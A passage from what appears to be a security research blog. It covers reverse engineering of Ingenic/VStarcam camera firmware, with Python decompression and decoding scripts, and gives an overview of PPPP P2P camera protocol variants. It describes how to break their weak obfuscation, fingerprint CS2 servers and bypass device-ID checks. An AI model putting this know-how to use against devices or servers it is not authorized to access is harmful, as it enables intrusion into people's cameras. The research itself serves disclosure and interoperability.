with open(path, 'wb') as output:
output.write(data)
if __name__ == '__main__':
if len(sys.argv) != 3:
print(f'Usage: {sys.argv[0]} in-file target-dir', file=sys.stderr)
sys.exit(1)
with open(sys.argv[1], 'rb') as input:
unpack_ingenic_update(input, sys.argv[2])
You will find some partitions rather tricky to unpack however.
Some partitions contain a file name at offset 34, typically rootfs_camera.cpio. These are LZO-compressed but lack the usual magic bytes. Instead, the first four bytes contain the size of compressed data in this partition. Once you replace these four bytes by 89 4c 5a 4f (removing trailing junk is optional) the partition can be uncompressed with the regular lzop tool and the result fed into cpio to get the individual files.
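That fix-up is easily scripted; here is a minimal sketch of the byte replacement described above (trailing junk is left in place, and the lzop/cpio invocations in the final comment are the obvious ones, adjust as needed):
#!/usr/bin/env python3
import sys

with open(sys.argv[1], 'rb') as f:
    data = f.read()

# Swap the leading size field for the lzop magic bytes; trailing junk stays.
with open(sys.argv[1] + '.lzo', 'wb') as f:
    f.write(b'\x89\x4c\x5a\x4f' + data[4:])

# Then: lzop -d <file>.lzo && cpio -idv < <file>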
Other Ingenic root partitions are more tricky. These also start with the data size but it is followed by the bytes 56 19 05 27 (that’s a uImage signature in reversed byte order). After that comes a compressed stream that sort of looks like LZMA but isn’t LZMA. What’s more: while binwalk will report that the Linux kernel is compressed via LZ4, it’s actually the same strange compression mechanism. The bootloader of these systems pre-dates the introduction of LZ4, so the same compression algorithm identifier was used for this compression mechanism that was later assigned to LZ4 by the upstream version of the bootloader.
What kind of compression is this? I’ve spent some time analyzing the bootloader but it turned out to be a red herring: apparently, the decompression is performed by hardware here, and the bootloader merely pushes the data into designated memory areas. Ugh!
At least the bootloader told me what this is called: jzlzma, apparently Ingenic’s proprietary LZMA variant. An LZMA header starts with a byte encoding some compression properties (typically 5D), a 4 byte dictionary size and an 8 byte uncompressed size. Ingenic’s header is missing the compression properties, and the uncompressed size is merely 4 bytes. But even accounting for these differences the stream cannot be decompressed with a regular LZMA decoder.
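For reference, reading this header could look like the following sketch. It is based on my description above; the little-endian byte order is an assumption on my part.
import struct

def parse_jzlzma_header(data: bytes) -> tuple[int, int]:
    # Regular LZMA: properties byte, 4 byte dictionary size, 8 byte size.
    # Ingenic's variant: no properties byte, 4 byte dictionary size,
    # 4 byte uncompressed size (byte order assumed to be little-endian).
    dict_size, uncompressed_size = struct.unpack_from('<LL', data, 0)
    return dict_size, uncompressed_size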
Luckily, with the algorithm name I found tools on Github that are meant to create firmware images for the Ingenic platform. These included an lzma binary which turned out to be an actual LZMA tool from 2005 hacked up to produce a second compressed stream in Ingenic’s proprietary format.
As I found, Ingenic’s format has essentially two differences to regular LZMA; the more consequential one is that the probabilistic range coding is replaced by plain bit encoding.
That change essentially turns LZMA into LZ77. Clearly, the issue here was the complexity of implementing probabilistic range coding in hardware. Of course, it also makes the resulting algorithm produce considerably worse compression ratios than LZMA and even worse than much simpler LZ77-derived algorithms like deflate. And there is plenty of hardware to do deflate decompression. But at least they managed to obfuscate the data…
My original thought was to “fix” their stream and turn it into proper LZMA. But range coding is not only complex, it is also context-dependent: it cannot be redone without decompressing first. So I ended up just writing the decompression logic in Python, which luckily was much simpler than doing the same for LZMA proper.
Note: The following script is minimalistic and wasn’t built for performance. Also, it expects a file that starts with a dictionary size (typically the bytes 00 00 01 00), so if you have some header preceding it you need to remove it first. It will also happily “uncompress” any trailing junk you might have there.
#!/usr/bin/env python3
import sys

kStartPosModelIndex, kEndPosModelIndex, kNumAlignBits = 4, 14, 4

def reverse_bits(n, bits):
    reversed = 0
    for i in range(bits):
        reversed <<= 1
        if n & (1 << i):
            reversed |= 1
    return reversed

def bit_stream(data):
    for byte in data:
        for bit in range(8):
            yield 1 if byte & (1 << bit) else 0

def read_num(stream, bits):
    num = 0
    for _ in range(bits):
        num = (num << 1) | next(stream)
    return num

def decode_length(stream):
    if next(stream) == 0:
        return read_num(stream, 3) + 2
    elif next(stream) == 0:
        return read_num(stream, 3) + 10
    else:
        return read_num(stream, 8) + 18

def decode_dist(stream):
    posSlot = read_num(stream, 6)
    if posSlot < kStartPosModelIndex:
        pos = posSlot
    else:
        numDirectBits = (posSlot >> 1) - 1
        pos = (2 | (posSlot & 1)) << numDirectBits
        if posSlot < kEndPosModelIndex:
            pos += reverse_bits(read_num(stream, numDirectBits), numDirectBits)
        else:
            pos += read_num(stream, numDirectBits - kNumAlignBits) << kNumAlignBits
            pos += reverse_bits(read_num(stream, kNumAlignBits), kNumAlignBits)
    return pos

def jzlzma_decompress(data):
    stream = bit_stream(data)
    reps = [0, 0, 0, 0]
    decompressed = []
    try:
        while True:
            if next(stream) == 0:   # LIT
                byte = read_num(stream, 8)
                decompressed.append(byte)
            else:
                size = 0
                if next(stream) == 0:   # MATCH
                    size = decode_length(stream)
                    reps.insert(0, decode_dist(stream))
                    reps.pop()
                elif next(stream) == 0:
                    if next(stream) == 0:   # SHORTREP
                        size = 1
                    else:   # LONGREP[0]
                        pass
                elif next(stream) == 0:   # LONGREP[1]
                    reps.insert(0, reps.pop(1))
                elif next(stream) == 0:   # LONGREP[2]
                    reps.insert(0, reps.pop(2))
                else:   # LONGREP[3]
                    reps.insert(0, reps.pop(3))

                if size == 0:
                    size = decode_length(stream)

                curLen = len(decompressed)
                start = curLen - reps[0] - 1
                while size > 0:
                    end = min(start + size, curLen)
                    decompressed.extend(decompressed[start:end])
                    size -= end - start
    except StopIteration:
        return bytes(decompressed)

if __name__ == '__main__':
    if len(sys.argv) != 3:
        print(f'Usage: {sys.argv[0]} in-file.jzlzma out-file', file=sys.stderr)
        sys.exit(1)

    with open(sys.argv[1], 'rb') as input:
        data = input.read()

    data = jzlzma_decompress(data[8:])

    with open(sys.argv[2], 'wb') as output:
        output.write(data)
The uncompressed root partition can be fed into the regular cpio tool to get the individual files.
There was one update using a completely different format despite also being meant for the Ingenic hardware. This one started with the bytes a5 ef fe 5a and had a SquashFS image at offset 0x3000. The unpacked contents (binwalk will do) don’t look like any of the other updates either: this definitely isn’t a camera, and it doesn’t have a PPPP implementation. Given the HDMI code I can only guess that this is a Network Video Recorder (NVR).
As to those security issues I am glad to report that VStarcam solved the telnet issue:
export PATH=/system/system/bin:$PATH
#telnetd
export LD_LIBRARY_PATH=/system/system/lib:/mnt/lib:$LD_LIBRARY_PATH
mount -t tmpfs none /tmp -o size=3m
/system/system/bin/brushFlash
/system/system/bin/updata
/system/system/bin/wifidaemon &
/system/system/bin/upgrade &
Yes, their startup script really has the telnetd call commented out. At least that’s usually the case: there are updates from 2018 that no longer open the telnet port, and there are other updates from 2025 that still do. Don’t ask me why. From what I can tell the hardcoded administrator credentials are still universally present, but these are only problematic for the latter group.
It’s a similar story with the system.ini file that was accessible without authentication. Some firmware versions had this file moved to a different directory, others still have it in the web root. There is no real system behind it, and I even doubt that this was a security-induced change rather than an adjustment to a different hardware platform.
My previous article on IoT “P2P” cameras couldn’t go into much detail on the PPPP protocol. However, there is already lots of security research on and around that protocol, and I have a feeling that there is way more to come. There are pieces of information on the protocol scattered throughout the web, yet each one approaches it from a very specific, narrow angle. This is my attempt at creating an overview so that other people don’t need to start from scratch.
While the protocol can in principle be used by any kind of device, it is mostly being used for network-connected cameras. It isn’t really peer-to-peer as advertised but rather relies on central servers, yet the protocol allows the bulk of the data to be transferred via a direct connection between the client and the device. It’s hard to tell how many users there are, but there are lots of apps – I’m sure that I haven’t found all of them.
There are other protocols with similar approaches being used for the same goal. One is used by ThroughTek’s Kalay Platform, which has the interesting string “Charlie is the designer of P2P!!” in its codebase (32 bytes long, seemingly used as “encryption” key for some non-critical functionality). I recognize both the name and the “handwriting,” so it looks like the PPPP protocol designer found a new home here. Yet PPPP still seems to be more popular than the competition, thanks to being the protocol of choice for cheap low-end cameras.
Disclaimer: Most of the information below has been acquired by analyzing public information as well as reverse engineering applications and firmware, not by observing live systems. Consequently, there can be misinterpretations.
The protocol’s goal is to serve as a drop-in replacement for TCP. Rather than establish a connection to a known IP address (or a name to be resolved via DNS), clients connect to a device identifier. The abstraction is supposed to hide away how the device is located (via a server that keeps track of its IP address), how a direct communication channel is established (via UDP hole punching) or when one of multiple possible fallback scenarios is being used because direct communication is not possible.
The protocol is meant to be resilient, so there are usually three redundant servers handling each network. When a device or client needs to contact a server, it sends the same message to all of them and doesn’t care which one will reply. Note: In this article “network” generally means a PPPP network, i.e. a set of servers and the devices connecting to them. While client applications typically support multiple networks, devices are always associated with a specific one determined by their device prefix.
For what is meant to be a transport layer protocol, PPPP has some serious complexity issues. It encompasses device discovery on the LAN via UDP broadcasts, UDP communication between device/client and the server, and a number of (not exactly trivial) fallback solutions. It also features multiple “encryption” algorithms, which are more accurately described as obfuscation, as well as network management functionality.
Paul Marrapese’s Wireshark Dissector provides an overview of the messages used by the protocol. While it isn’t quite complete, a look into the pppp.fdesc file shows roughly 70 different message types. It’s hard to tell how all these messages play together as the protocol has not been designed as a state machine. The protocol implementation uses its previous actions as context to interpret incoming messages, but it has little indication as to which messages are expected when. Observing a running system is essential to understanding this protocol.
The complicated message exchange required to establish a connection between a device and a client has been described by Elastic Security Labs. They also provide the code of their client which implements that secret handshake.
I haven’t seen any descriptions of how the fallback approaches work when a direct connection cannot be established. Neither could I observe these fallbacks in action, presumably because the network I observed didn’t enable them. There are at least three such fallbacks: UDP traffic can be relayed by a network-provided server, it can be relayed by a “supernode” which is a device that agreed to be used as a relay, and it can be wrapped in a TCP connection to the server. The two centralized solutions incur significant costs for the network owners, rendering them unpopular. And I can imagine the “supernode” approach to be less than reliable with low-end devices like these cameras (it’s also a privacy hazard but this clearly isn’t a consideration).
I recommend going through the CS2 sales presentation to get an idea of how the protocol is meant to work. Needless to say that it doesn’t always work as intended.
I could identify a number of network ports being used, most importantly UDP port 32100 for the communication with the servers and TCP port 443 for the TCP-based fallback.
Note that while port 443 is normally associated with HTTPS, here it was apparently only chosen to fool firewalls. The traffic is merely obfuscated, not really encrypted.
The direct communication between the client and the device uses a random UDP port. In my understanding the ports are also randomized when this communication is relayed by a server or supernode.
The canonical representation of a device ID looks like this: ABC-123456-VWXYZ. Here ABC is a device prefix. While a PPPP network will often handle more than one device prefix, mapping a device prefix to a set of servers is supposed to be unambiguous. This rule isn’t enforced across different protocol variants however, e.g. the device prefix EEEE is assigned differently by CS2 and iLnk.
The six digit number following the device prefix allows distinguishing different devices within a prefix. It seems that vendors can choose these numbers freely – some will assign them to devices sequentially, others go by some more complicated rules. A comment on my previous article even claims that they will sometimes reassign existing device IDs to new devices.
The final part is the verification code, meant to prevent enumeration of devices. It is generated by some secret algorithm and allows distinguishing valid device IDs from invalid ones. At least one such algorithm got leaked in the past.
Depending on the application a device ID will not always be displayed in its canonical form. It’s pretty typical for the dashes to be removed for example, in one case I saw the prefix being shortened to one letter. Finally, there are applications that will hide the device ID from the user altogether, displaying only some vendor-specific ID instead.
So far I could identify at least four variants of this protocol – if you count HLP2P which is questionable. These protocol implementations differ significantly and aren’t really compatible. A number of apps can work with different protocol implementations but they generally do it by embedding multiple client libraries.
| Variant | Typical client library names | Typical functions |
|---|---|---|
| CS2 Network | libPPCS_API.so libobject_jni.so librtapi.so | PPPP_Initialize PPPP_ConnectByServer |
| Yi Technology | PPPP_API.so libmiio_PPPP_API.so | PPPP_Initialize PPPP_ConnectByServer |
| iLnk | libvdp.so libHiChipP2P.so | XQP2P_Initialize XQP2P_ConnectByServer HI_XQ_P2P_Init |
| HLP2P | libobject_jni.so libOKSMARTPPCS.so | HLP2P_Initialize HLP2P_ConnectByServer |
The Chinese company CS2 Network is the original developer of the protocol. Their implementation can sometimes be recognized without even looking at any code, just by the device IDs. The letters A, I, O and Q are never present in the verification code, so there are only 22 valid letters here. The same seems to apply to the Yi Technology fork however, which is generally very similar.
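If you want to automate that check, a trivial heuristic based purely on this observation could look like the following. Take it with a grain of salt, it obviously cannot prove anything:
def looks_like_cs2_code(verification_code: str) -> bool:
    # CS2/Yi-style verification codes appear to never contain A, I, O or Q.
    return (len(verification_code) == 5 and
            all(c.isupper() and c not in 'AIOQ' for c in verification_code))

print(looks_like_cs2_code('VWXYZ'))  # True
print(looks_like_cs2_code('NRLXA'))  # False, contains an A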
The other giveaway is the “init string” which encodes network parameters. Typically these init strings are hardcoded in the application (sometimes hundreds of them) and chosen based on device prefix, though some applications retrieve them from their servers. These init strings are obfuscated, with the function PPPP_DecodeString doing the decoding. The approach is typical for CS2 Network: a lookup table filled with random values and some random algebraic operations to make things seem more complex. The init strings look like this:
DRFTEOBOJWHSFQHQEVGNDQEXFRLZGKLUGSDUAIBXBOIULLKRDNAJDNOZHNKMJO:SECRETKEY
The part before the colon decodes into:
127.0.0.1,192.168.1.1,10.0.0.1,
This is a typical list of three server IPs. No, the trailing comma isn’t a typo but required for correct parsing. Host names are occasionally used in init strings but this is uncommon. With CS2 Network generally distrusting DNS from the looks of it, they probably recommend that vendors sidestep it. The “secret” key behind the colon is optional and activates encryption of transferred data, which is better described as obfuscation. Unlike the server addresses, this part isn’t obfuscated.
The Xiaomi spinoff Yi Technology appears to have licensed the code of the CS2 Network implementation. It still uses much of the code of the original, such as the function decoding init strings. The lookup table is different here however, so the same init string as above would look slightly different:
LZERHWKWHUEQKOFUOREPNWERHLDLDYFSGUFOJXIXJMASBXANOTHRAFMXNXBSAM
I’ve removed the encryption key from the init string because this fork doesn’t seem to support any kind of encryption on the protocol level. On the application level AES encryption is being applied to audio and video streams; all the auxiliary communication is completely unencrypted however.
Paul Marrapese’s Wireshark Dissector appears to be woefully outdated with regards to the Yi Technology fork; the differences introduced here are actually quite extensive. The MSG_NOTICE_TO_EX message is particularly worth noting: it allows sending a JSON payload to the device that will trigger various commands. Judging by its “fancy” authentication mechanism this message is meant to be sent by Yi servers only. Before you get too excited: Yi firmware doesn’t seem to actually parse the JSON payload, it merely extracts the command value via substring matching and ignores the rest.
This fork also introduced a V2 message header variant that starts with an F2 magic byte instead of F1. While the only message actually sent with this header seems to be MSG_DEV_WAKEUP_REQ, the device will allow any message to start with it. The V2 variant adds 24 bytes to the original 4 byte message header.
Unless I am totally mistaken, the HMAC-SHA1 key used to sign this header is the tnp_license value, a six letter string calculated by the APILicenseCalculate function in the CS2 implementation. While the Yi implementation of the library no longer seems to expose this functionality, I have to assume that the same algorithm is being used here, merely with a different table which should be possible to recover from a few known license values. Not that it really matters: at least the firmware I saw simply ignored all the “new” stuff in the header.
Note: the same signing approach (and usually the same signing key) seems to be used for various messages such as MSG_PUNCH_TO_EX. While the signature is being verified here, it’s still possible to send the “old and busted” MSG_PUNCH_TO message (same message type, smaller payload size) instead and skip the signing. The approach used to sign MSG_NOTICE_TO_EX message is different, and this code seems to use a key which can actually be considered a secret.
Altogether, the messages differing from the CS2 implementation seem to be:
| Message | Message type | Payload size |
|---|---|---|
| MSG_HELLO | 00 | 0 or 24 |
| MSG_P2P_SERVER_REQ | 04 | 88 |
| MSG_SESSION_RESPONSE | 06 | 4 |
| MSG_DEV_LGN_PROXY | 10 | 128 + n (n is uint8 at offset 124) |
| MSG_DEV_LGN_PROXY_ACK | 11 | 20 |
| MSG_DEV_LGN_SIGN | 14 | 104 |
| MSG_DEV_LGN_SIGN_ACK | 15 | 4 |
| MSG_DEV_ONLINE_REQ | 18 | 20 |
| MSG_DEV_ONLINE_REQ_ACK | 19 | 8 |
| MSG_DEV_WAKEUP_REQ | 1A | 20 |
| MSG_P2P_TCP_SERVER | 22 | 16 |
| MSG_LAN_SEARCH | 30 | 24 |
| MSG_LAN_NOTIFY | 31 | 20 |
| MSG_LAN_NOTIFY_ACK | 32 | 20 |
| MSG_NOTICE_PING | 3A | 20 |
| MSG_NOTICE_PING_ACK | 3B | 24 |
| MSG_NOTICE_TO_EX | 3F | 96 + n (n is the size of the JSON payload, uint32 at offset 92) |
| MSG_NOTICE_TO_ACK | 3F | 96 + n (n is the size of the numeric response, uint16 at offset 92) |
| MSG_PUNCH_TO_EX | 40 | 44 |
| MSG_PUNCH_PKT_EX | 41 | 44 |
| MSG_P2P_RDY_EX | 42 | 40 |
| MSG_P2P_RDY_ACK | 43 | 0 |
| MSG_R2PMP_REQ | 50 | 56 |
| MSG_R2PMP_START | 51 | 40 |
| MSG_R2PMP_PKT | 52 | 40 |
| MSG_R2PMP_RDY | 53 | 40 |
| MSG_RLY_PORT_EX | 74 | 84 |
| MSG_RLY_PORT_ACK | 75 | 8 |
| MSG_RLY_HELLO_SDEV | 76 | 0 |
| MSG_RLY_HELLO_SDEV_ACK | 77 | 0 |
| MSG_RLY_TO_ACK | 85 | 28 |
| MSG_RLY_SERVER_REQ | 87 | 20 |
| MSG_RLY_SERVER_REQ_ACK | 87 | 20 |
| MSG_RLY_TCP_START | 88 | 84 |
| MSG_RLY_TCP_START_ACK | 88 | 20 |
| MSG_RLY_TCP_REQ | 89 | 52 |
| MSG_RLY_TCP_REQ_ACK | 89 | 4 |
| MSG_RLY_TCP_TO | 8A | 32 |
| MSG_RLY_TCP_TO_ACK | 8A | 40 |
| MSG_RLY_TCP_PKT | 8B | 20 |
| MSG_RLY_TCP_RESULT | 8B | 4 |
| MSG_RLY_EASYTCP_START | 8C | 88 |
| MSG_SDEV_SESSIONREPORT | 93 | 68 |
| MSG_SDEV_SESSIONREPORT_ACK | 93 | 4 |
| MSG_SDEV_REPORT | 94 | 116 |
| MSG_CONNECT_REPORT | A0 | 40 |
| MSG_REPORT_REQ | A1 | 4 |
| MSG_REPORT | A2 | 100 |
| MSG_SENDDATA_REPORT | A4 | 28 |
| MSG_SENDDATA_REPORT_ACK | A4 | 4 |
| MSG_PROBE_START | AA | 20 or 1220 |
| MSG_PROBE_ACK | AB | 24 + n · 16 (n is the probe count, uint32 at offset 20) |
| MSG_PROBE_ACK2 | AC | 20 |
| MSG_SERVER_CONFIG_REQ | B0 | 40 |
| MSG_DRW_ACK | D2 | 4 |
| MSG_ALIVE | E0 | 0 or 4 |
| MSG_ALIVE_ACK | E1 | 0 or 4 |
| MSG_BITRATE_INFO | E5 | 8 |
The protocol fork by Shenzhen Yunni Technology iLnkP2P seems to have been developed from scratch. The device IDs for legacy iLnk networks are easy to recognize because their verification codes only consist of the letters A to F. The algorithm generating these verification codes is public knowledge (CVE-2019-11219) so we know that these are letters taken from an MD5 hex digest. New iLnk networks appear to have verification codes that can contain all Latin letters, some new algorithm replaced the compromised one here. Maybe they use Base64 digests now?
An iLnk init string can be recognized by the presence of a dash:
ATBBARASAXAOAQAOAQAOARBBARAZASAOARAWAYAOARAOARBBARAQAOAQAOAQAOAR-$$
The part before the dash decodes into:
3;127.0.0.1;192.168.1.1;10.0.0.1
Yes, the first list entry has to specify how many server IPs there are. The decoding approach (function HI_DecStr or XqStrDec depending on the implementation) is much simpler here; it’s a kind of Base26 encoding. The part after the dash can encode additional parameters related to validation of device IDs, but typically it will be $$, indicating that it is omitted and network-specific device ID validation can be skipped. As far as I can tell, iLnk networks will always send all data as plain text, there is no encryption functionality of any kind.
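Based on the example above, each pair of letters appears to encode one ASCII character. Here is a minimal sketch of what HI_DecStr/XqStrDec seem to be doing, inferred from this single sample (so consider the exact offset an assumption):
def ilnk_decode(encoded: str) -> str:
    # Two letters per character: value = first * 26 + second, shifted into
    # the printable ASCII range (an offset of 32 matches the sample above).
    chars = []
    for i in range(0, len(encoded), 2):
        value = (ord(encoded[i]) - ord('A')) * 26 + (ord(encoded[i + 1]) - ord('A'))
        chars.append(chr(value + 32))
    return ''.join(chars)

print(ilnk_decode('ATBBARASAXAOAQAOAQAOARBBARAZASAOARAWAYAOARAOARBBARAQAOAQAOAQAOAR'))
# prints: 3;127.0.0.1;192.168.1.1;10.0.0.1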
Going through the code, the network-level changes in the iLnk fork are extensive, with only the most basic messages shared with the original PPPP protocol. Some message types clash – for example, MSG_DEV_MAX uses the same type as MSG_DEV_LGN_CRC in the CS2 implementation. This fork also introduces new magic numbers: while PPPP messages normally start with 0xF1, some messages here start with 0xA1 and one for some reason with 0xF2. In the table below I list the magic number as part of the message type.
Unfortunately, I haven’t seen any comprehensive analysis of this protocol variant yet, so I’ll just list the message types along with their payload sizes. For messages with 20-byte payloads it can be assumed that the payload is a device ID. Don’t ask me why two pairs of messages share the same message type.
| Message | Message type | Payload size |
|---|---|---|
| MSG_HELLO | F1 00 | 0 |
| MSG_HELLO_ACK | F1 01 | IPv4: 16, IPv6: 128 |
| MSG_RLY_TO | F1 02 | 32 |
| MSG_RLY_PKT | F1 03 | 0 |
| MSG_DEV_LGN | F1 10 | IPv4: 40, IPv6: 152 |
| MSG_DEV_LGN_ACK | F1 11 | 4 |
| MSG_DEV_MAX | F1 12 | 20 |
| MSG_P2P_REQ | F1 20 | IPv4: 36, IPv6: 152 |
| MSG_P2P_REQ_ACK | F1 21 | 4 |
| MSG_LAN_SEARCH | F1 30 | 0 |
| MSG_LAN_SEARCH_EXT | F1 32 | 0 |
| MSG_LAN_SEARCH_EXT_ACK | F1 33 | 52 |
| MSG_DEV_UNREACH | F1 35 | 20 |
| MSG_PUNCH_PKT | F1 41 | 20 |
| MSG_P2P_RDY | F1 42 | 20 |
| MSG_RS_LGN | F1 60 | 28 |
| MSG_RS_LGN_EX | F1 62 | 44 |
| MSG_LST_REQ | F1 67 | 20 |
| MSG_LST_REQ_ACK | F1 69 | 4 + n · 16 (n is the relay address count, int32 at offset 0) |
| MSG_RLY_HELLO | F1 70 | 0 |
| MSG_RLY_HELLO_ACK | F1 71 | 0 |
| MSG_RLY_PORT | F1 72 | 0 |
| MSG_RLY_PORT_ACK | F1 73 | 8 |
| MSG_RLY_PORTEX_ACK | F1 76 | 264 |
| MSG_RLY_REQ_EX | F1 77 | 288 |
| MSG_RLY_REQ | F1 80 | IPv4: 40, IPv6: 160 |
| MSG_RLY_REQ_ACK | F1 81 | 4 |
| MSG_HELLO_TO | F1 82 | 20 |
| MSG_HELLO_TO_ACK | F1 83 | 28 |
| MSG_RLY_RDY | F1 84 | 20 |
| MSG_SDEV_RUN | F1 90 | 0 |
| MSG_SDEV_LGN | F1 91 | 20 |
| MSG_SDEV_LGN_ACK | F1 91 | IPv4: 16, IPv6: 128 |
| MSG_MGM_ADMIN | F1 A0 | 160 |
| MSG_MGM_DEVLIST_CTRL | F1 A2 | 20 |
| MSG_MGM_HELLO | F1 A4 | 4 |
| MSG_MGM_MULTI_DEV_CTRL | F1 A6 | 24 + n · 4 (n is uint32 at offset 20) |
| MSG_MGM_DEV_DETAIL | F1 A8 | 24 |
| MSG_MGM_DEV_VIEW | F1 AA | 4 |
| MSG_MGM_RLY_LIST | F1 AC | 12 |
| MSG_MGM_DEV_CTRL | F1 AE | 24 |
| MSG_MGM_MEM_DB | F1 B0 | 264 |
| MSG_MGM_RLY_DETAIL | F1 B2 | 24 |
| MSG_MGM_ADMIN_LGOUT | F1 BA | 4 |
| MSG_MGM_ADMIN_CHG | F1 BC | 164 |
| MSG_VGW_LGN | F1 C0 | 24 |
| MSG_VGW_LGN_EX | F1 C0 | 24 |
| MSG_VGW_REQ | F1 C3 | 20 |
| MSG_VGW_REQ_ACK | F1 C4 | 4 |
| MSG_VGW_HELLO | F1 C5 | 0 |
| MSG_VGW_LST_REQ | F1 C6 | 20 |
| MSG_VGW_LST_ACK | F1 C7 | 8 + n · 128 (n is the target address count, int32 at offset 0) |
| MSG_DRW | F1 D0 | 4 + n (n is the implied payload size) |
| MSG_DRW_ACK | F1 D1 | 4 + n · 2 (n is the sequence ID count, uint16 at offset 2) |
| MSG_P2P_ALIVE | F1 E0 | 0 |
| MSG_P2P_ALIVE_ACK | F1 E1 | 0 |
| MSG_CLOSE | F1 F0 | 0 |
| MSG_MGM_DEV_LGN_DETAIL_DUMP | F1 F4 | 12 |
| MSG_MGM_DEV_LGN_DUMP | F1 F4 | 12 |
| MSG_MGM_LOG_CTRL | F1 F7 | 12 |
| MSG_SVR_REQ | F2 10 | 0 |
| MSG_SVR_REQ_ACK | F2 11 | variable (NUL-terminated) |
| MSG_DEV_LV_HB | A1 00 | 20 |
| MSG_DEV_SLP_HB | A1 01 | 20 |
| MSG_DEV_QUERY | A1 02 | 20 |
| MSG_DEV_WK_UP_REQ | A1 04 | 20 |
| MSG_DEV_WK_UP | A1 06 | 20 |
While I’ve seen a few apps with HLP2P code and the corresponding init strings, I am not sure whether these are still used or merely leftovers from some past adventure. All these apps primarily use networks that rely on other protocol implementations.
HLP2P init strings contain a dash that follows merely three letters. These three letters are ignored, and I am unsure about their significance as I’ve only seen one variant:
DAS-0123456789ABCDEF
The decoding function is called from the HLP2P_Initialize function and uses the most elaborate approach of all. The hex-encoded part after the dash is decrypted using AES-CBC where the key and initialization vector are derived from a zero-filled buffer via some bogus MD5 hashing. The decoded result is a list of comma-separated parameters like:
DCDC07FF,das,10000001,a+a+a,127.0.0.1-192.168.1.1-10.0.0.1,ABC-CBA
The fifth parameter is a list of server IP addresses and the sixth appears to be the list of supported device prefixes.
On the network level HLP2P is an oddity here. Despite trying hard to provide the same API as other PPPP implementations, including concepts like init strings and device IDs, it appears to be a TCP-based protocol (connecting to the server’s port 65527) with little resemblance to PPPP. UDP appears to be used for local broadcasts only (on port 65531). I didn’t spend too much time on the analysis however.
The CS2 implementation of the protocol is the only one that bothers with encrypting data, though their approach is better described as obfuscation. When encryption is enabled, the function P2P_Proprietary_Encrypt is applied to all outgoing and the function P2P_Proprietary_Decrypt to all incoming messages. These functions take the encryption key (which is typically visible in the application code as an unobfuscated part of the init string, resulting in common keys being documented online) and mash it into four bytes. These four bytes are then used to select values from a static table that the bytes of the message should be XOR’ed with. A number of public reimplementations for this “encryption” exist, e.g. this one.
While an effective four byte encryption key is already bad enough, the cryptography here is actually even worse. I’ve published an analysis of this encryption algorithm which comes to the conclusion that there are at most 540,672 effective keys and still considerably fewer possible ciphertexts. These flaws allow communication even without the knowledge of the encryption key: sending all possible ciphertexts of the request and in most cases recovering the effective encryption key from a single response.
The same obfuscation is used unconditionally for TCP traffic in the CS2 implementation which uses TCP port 443 as fallback. Here each message header contains two random bytes. The hex representation of these bytes is used as key to obfuscate message contents.
All *_CRC messages like MSG_DEV_LGN_CRC have an additional layer of obfuscation, performed by the functions PPPP_CRCEnc and PPPP_CRCDec. Unlike P2P_Proprietary_Encrypt which is applied to the entire message including the header, PPPP_CRCEnc is only applied to the payload. As normally only messages exchanged between the device and the server are obfuscated in this way, the corresponding key tends to be contained only in the device firmware and not in the application. Here as well the key is mashed into four bytes which are then used to generate a byte sequence that the message (extended by four + signs) is XOR’ed with. This is effectively an XOR cipher with a static key which is easy to crack even without knowing the key.
The CS2 implementation of the protocol contains a curiosity: two messages starting with 338DB900E559 being processed in a special way. No, this isn’t a hexadecimal representation of the bytes – it’s literally the message contents. No magic bytes, no encryption, the messages are expected to be 17 bytes long and are treated as zero-terminated strings.
I tried sending 338DB900E5592B32 (with a trailing zero byte) to a PPPP server and, surprisingly, received a response (non-ASCII bytes are represented as escape sequences):
\x0e\x0ay\x07\x08uT_ChArLiE@Cs2-NeTwOrK.CoM!
This response was consistent for this server, but another server of the same network responded slightly differently:
\x0e\x0ay\x07\x08vT_ChArLiE@Cs2-NeTwOrK.CoM!
A server from a different network which normally encrypts all communication also responded:
\x17\x06f\x12fDT_ChArLiE@Cs2-NeTwOrK.CoM!
It doesn’t take a lot of cryptanalysis knowledge to realize that an XOR cipher with a constant key is being applied here. Thanks to my “razor sharp deduction” I could conclude that the servers are replying with their respective names and these names are being XOR’ed with the string CS2MWDT_ChArLiE@Cs2-NeTwOrK.CoM!. Yes, likely the very same Charlie already mentioned at the start of this article. Hi, Charlie!
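For anyone wanting to replicate this: the “decryption” is a single XOR with that constant string. A quick sketch follows; the response bytes are my reading of the escape sequences above, so treat the decoded name as illustrative.
KEY = b'CS2MWDT_ChArLiE@Cs2-NeTwOrK.CoM!'

def decode_server_name(response: bytes) -> str:
    decoded = bytes(r ^ k for r, k in zip(response, KEY))
    return decoded.rstrip(b'\x00').decode('ascii', errors='replace')

# First response from above; appears to decode to something like MYKJ_1.
print(decode_server_name(b'\x0e\x0ay\x07\x08uT_ChArLiE@Cs2-NeTwOrK.CoM!'))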
I didn’t risk sending the other message, not wanting to shut down a server accidentally. But maybe Shodan wants to extend their method of detecting PPPP servers: their current approach only works when no encryption is used, yet this message seems to get replies from all CS2 servers regardless of encryption.
Once a connection between the client and the device is established, MSG_DRW messages are exchanged in both directions. The messages will be delivered in order and retransmitted if lost, giving application developers something resembling a TCP stream if you don’t look too closely. In addition, each message is tagged with a channel ID, a number between 0 and 7. It looks like channel IDs are universally ignored by devices and are only relevant in the other direction. The idea seems to be that a client receiving a video stream should still be able to send commands to the device and receive responses over the same connection.
The PPPP protocol doesn’t make any recommendations about how applications should encode their data within that stream, and so they developed a number of wildly different application-level protocols. As a rule of thumb, all devices and clients on a particular PPPP network will always speak the same application-level protocol, though there might be slight differences in the supported capabilities. Different networks can share the same protocol, allowing them to be supported within the same application. Usually, there will be multiple applications implementing the same application-level protocol and working with the same PPPP networks, but I haven’t yet seen any applications supporting different protocols.
This allows grouping the applications by their application-level protocol. Applications within the same group are largely interchangeable; the same devices can be accessed from any of them. This doesn’t necessarily mean that everything will work correctly, as there might still be subtle differences. E.g. an application meant for video doorbells probably accesses somewhat different functionality than one meant for security cameras, even if both share the same protocol. Also, devices might be tied to the cloud infrastructure of a specific application, rendering them inaccessible to other applications working with the same PPPP network.
Fun fact: it is often very hard to know up front which protocol your device will speak. There is a huge thread with many spin-offs where people are attempting to reverse engineer A9 Mini cameras so that these can be accessed without an app. This effort is being massively complicated by the fact that all these cameras look basically the same, yet depending on the camera one out of at least four extremely different protocols could be used: HDWifiCamPro variant of SHIX JSON, YsxLite variant of iLnk binary, JXLCAM variant of CGI calls, or some protocol I don’t know because it isn’t based on PPPP.
